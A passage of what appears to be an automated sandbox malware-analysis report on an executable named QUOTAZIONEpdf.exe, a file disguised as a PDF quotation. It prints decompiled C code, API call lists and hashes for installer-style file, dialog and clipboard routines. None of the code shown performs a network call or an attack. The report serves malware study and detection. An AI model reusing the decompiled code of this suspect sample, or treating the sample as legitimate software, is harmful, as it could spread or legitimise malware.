                0x004013c2
                0x004013b9
                0x004013b9
                0x004013ba
                0x004013ba
                0x004013c9
                0x004013cb
                0x004013f4
                0x004013f4
                0x004013c9
                0x00000000

                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040575C, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                0x00405760
                0x0040576d
                0x00405782
                0x00405788

                APIs
                • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,80000000,00000003), ref: 00405760
                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040573D, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040573D(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                0x00405741
                0x0040574a
                0x00000000
                0x00405753
                0x00405759

                APIs
                • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004031A8, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                0x004031ac
                0x004031bf
                0x004031c7
                0x00000000
                0x004031ce
                0x00000000
                0x004031d0

                APIs
                • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004031DA, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}




                0x004031e8
                0x004031ee

                APIs
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00404F61, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420498;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

































                0x00404f6a
                0x00404f70
                0x00404f79
                0x00404f7c
                0x00405114
                0x00405138
                0x00405138
                0x0040514b
                0x00405169
                0x00405170
                0x004051c7
                0x004051cb
                0x00000000
                0x004051d2
                0x004051da
                0x004051e2
                0x004051e5
                0x004052de
                0x00000000
                0x004052de
                0x004051f4
                0x00405200
                0x00405206
                0x0040520c
                0x00405221
                0x00405227
                0x0040520e
                0x00405213
                0x00405219
                0x0040521c
                0x0040521c
                0x00405237
                0x0040523f
                0x00405242
                0x0040524b
                0x0040524e
                0x00405255
                0x0040525c
                0x00405264
                0x00405264
                0x0040527b
                0x0040527b
                0x00405282
                0x00405288
                0x00405291
                0x00405298
                0x004052a1
                0x004052a3
                0x004052a6
                0x004052b5
                0x004052b7
                0x004052bd
                0x004052be
                0x004052bf
                0x004052c7
                0x004052d2
                0x004052d8
                0x004052d8
                0x00000000
                0x00405242
                0x004051cb
                0x00405178
                0x004051a8
                0x004051b0
                0x004051b2
                0x004051bb
                0x004051bb
                0x004051c2
                0x00000000
                0x004051c2
                0x0040517c
                0x00405186
                0x00000000
                0x0040514d
                0x00405153
                0x0040518b
                0x00000000
                0x00405194
                0x0040515c
                0x00405161
                0x00405164
                0x00000000
                0x00405164
                0x0040514b
                0x00404f82
                0x00404f86
                0x00404f8f
                0x00404f96
                0x00404f99
                0x00404f9c
                0x00404f9f
                0x00404fa0
                0x00404fa1
                0x00404fba
                0x00404fbd
                0x00404fc7
                0x00404fd6
                0x00404fde
                0x00404fe6
                0x00404feb
                0x00404fee
                0x00404ffa
                0x00405003
                0x0040500c
                0x0040502f
                0x00405035
                0x00405046
                0x0040504b
                0x00405059
                0x00405067
                0x00405067
                0x0040506c
                0x0040507a
                0x0040507a
                0x0040507f
                0x00405082
                0x00405087
                0x00405093
                0x0040509c
                0x004050a9
                0x004050b8
                0x004050ab
                0x004050b0
                0x004050b0
                0x004050c4
                0x004050c4
                0x004050d8
                0x004050e1
                0x004050ea
                0x004050fa
                0x00405106
                0x00405106
                0x00000000

                APIs
                • GetDlgItem.USER32 ref: 00404FC0
                • GetDlgItem.USER32 ref: 00404FCF
                • GetClientRect.USER32 ref: 0040500C
                • GetSystemMetrics.USER32 ref: 00405014
                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
                • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
                • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
                • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                • ShowWindow.USER32(?,00000008), ref: 004050B0
                • GetDlgItem.USER32 ref: 004050D1
                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
                • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
                • GetDlgItem.USER32 ref: 00404FDE
                  • Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A
                • GetDlgItem.USER32 ref: 00405123
                • CreateThread.KERNEL32 ref: 00405131
                • CloseHandle.KERNEL32(00000000), ref: 00405138
                • ShowWindow.USER32(00000000), ref: 0040515C
                • ShowWindow.USER32(?,00000008), ref: 00405161
                • ShowWindow.USER32(00000008), ref: 004051A8
                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051DA
                • CreatePopupMenu.USER32 ref: 004051EB
                • AppendMenuA.USER32 ref: 00405200
                • GetWindowRect.USER32 ref: 00405213
                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
                • OpenClipboard.USER32(00000000), ref: 00405282
                • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                • GlobalLock.KERNEL32 ref: 0040529B
                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                • SetClipboardData.USER32 ref: 004052D2
                • CloseClipboard.USER32 ref: 004052D8
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                • String ID: {
                • API String ID: 590372296-366298937
                • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404772, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 97%
                			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x420474;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42048c;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x420474 = _t315;
								 *0x42048c = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42048c;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42048c);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
